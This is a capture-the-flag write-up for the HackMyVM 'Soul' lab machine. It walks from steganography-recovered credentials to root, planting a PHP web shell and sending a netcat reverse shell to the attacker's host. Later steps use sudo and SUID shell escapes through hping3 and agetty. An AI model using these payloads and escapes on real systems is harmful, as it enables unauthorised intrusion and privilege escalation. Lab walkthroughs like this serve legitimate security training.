HMV Soul Summary

2026-03-27 2026-03-27315 Words

Scope

  • Name: Soul
  • Diffculty: (4/10)
  • OS: Linux
  • IP: soul.hmv(192.168.56.108)

Foothold

There is just a image at homepage. 

❯ curl http://soul.hmv
 <img src="saint.jpg">
saint.jpg
Figure 1: Daniel in the lion's den

Then I find this image within Google Image Search, here is the wikipedia about it. I could gather a user daniel and saint from this image.

After that, I discover a secret password within that image by steg analysis. 

❯ stegseek saint.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""
[i] Original filename: "pass.txt".
[i] Extracting to "saint.jpg.out".
❯ cat saint.jpg.out
lionsarebigcats

Luckily, I try ssh with that two user, the daniel stands out.

Privilege Escalation

daniel --> www-data

User Information 
root:x:0:0:root:/root:/bin/bash
daniel:x:1000:1000:daniel,,,:/home/daniel:/usr/bin/rbash
gabriel:x:1001:1001:,,,:/home/gabriel:/bin/bash
peter:x:1002:1002:,,,:/home/peter:/bin/bash

I first use python to get a interactive shell, since the initial user daniel uses rbash which is a restricted shell. 

python3 -c "import os;os.system('/bin/bash -ip')"
sudo rules 
[sudo] password for daniel:
Sorry, user daniel may not run sudo on soul.
SUID files 
/usr/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/sbin/agetty
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device

There is a interesting executable agetty but I(daniel) currently have no permission to execute it. 

daniel@soul:~$ ls -al /usr/sbin/agetty
-rwsrws--- 1 root peter 64744 Jan 10  2019 /usr/sbin/agetty (agetty)
Network 
daniel@soul:~$ ss -tnlup
Netid         State          Recv-Q         Send-Q                 Local Address:Port                 Peer Address:Port
udp           UNCONN         0              0                            0.0.0.0:68                        0.0.0.0:*
tcp           LISTEN         0              128                          0.0.0.0:80                        0.0.0.0:*
tcp           LISTEN         0              128                          0.0.0.0:22                        0.0.0.0:*
tcp           LISTEN         0              128                             [::]:80                           [::]:*
tcp           LISTEN         0              128                             [::]:22                           [::]:*
Owned Files 
daniel@soul:~$ find / -mount -group daniel -type f
/home/daniel/.bashrc
/home/daniel/.bash_logout
/home/daniel/.Xauthority
/home/daniel/.profile
/var/www/html/saint.jpg
/var/lib/sudo/lectured/daniel

Lastly, I back to the web directory, since I find useful clue from nginx configuration. 

daniel@soul:~$ grep -vE '#|^$' /etc/nginx/nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
    worker_connections 768;
}
http {
    sendfile on;
    tcp_nopush on;
    tcp_nodelay on;
    keepalive_timeout 65;
    types_hash_max_size 2048;
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    ssl_prefer_server_ciphers on;
    access_log /var/log/nginx/access.log;
    error_log /var/log/nginx/error.log;
    gzip on;
    include /etc/nginx/conf.d/*.conf;
    include /etc/nginx/sites-enabled/*;
}
daniel@soul:~$ grep -vE '#|^$' /etc/nginx/sites-enabled/default
server {
    listen 80 default_server;
    listen [::]:80 default_server;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    server_name _;
    location / {
        try_files $uri $uri/ =404;
    }
}
server {
    listen 80;
    listen [::]:80;
    server_name lonelysoul.hmv;
    root /var/www/html;
    index index.html;
    location / {
        try_files $uri $uri/ =404;
    }
               location ~ \.php$ {
               include snippets/fastcgi-php.conf;
               fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        }
}

Here nginx define two server and the later one could be exploited to execute php code.

The later one server only serve requests for lonelysoul.hmv domain, the former looks like handler for any others. 192.168.56.108 soul.hmv 192.168.56.108 lonelysoul.hmv

Then I lateral to www-data user by following payload. 

daniel@soul:/var/www/html$ cat shell.php
<?php system($_GET["cmd"]); ?>
❯ curl 'http://lonelysoul.hmv/shell.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
❯ curl 'http://lonelysoul.hmv/shell.php?cmd=nc%09192.168.56.1%091234%09-e%09/bin/bash'

www-data --> gabriel

www-data@soul:~/html$ sudo -l
Matching Defaults entries for www-data on soul:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on soul:
    (gabriel) NOPASSWD: /tmp/whoami

Luckily, this sudo rule already means that I'm also gabriel! Since I could execute any command within that user. 

www-data@soul:~/html$ cat /tmp/whoami
$!/bin/bash
/bin/bash -i
www-data@soul:~/html$ sudo -u gabriel /tmp/whoami
gabriel@soul:/var/www/html$ id
uid=1001(gabriel) gid=1001(gabriel) groups=1001(gabriel)

gabriel --> peter

gabriel@soul:~$ sudo -l
Matching Defaults entries for gabriel on soul:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gabriel may run the following commands on soul:
    (peter) NOPASSWD: /usr/sbin/hping3

Woo, this also straightforward that GTFBins - hping3 help me to achieve this goal. 

gabriel@soul:~$ sudo -u peter /usr/sbin/hping3
hping3> /bin/bash
peter@soul:/home/gabriel$ id
uid=1002(peter) gid=1002(peter) groups=1002(peter)

peter --> root

The last step is also simple, the SUID file agetty I find before could be executed by current use. 

peter@soul:/home/gabriel$ agetty -l /bin/bash -o -p -a root tty

Debian GNU/Linux 10 soul tty

soul login: root (automatic login)

bash-5.0# id
uid=1002(peter) gid=1002(peter) euid=0(root) groups=1002(peter)
Creator: Emacs 31.0.50 (Org mode 10.0-pre)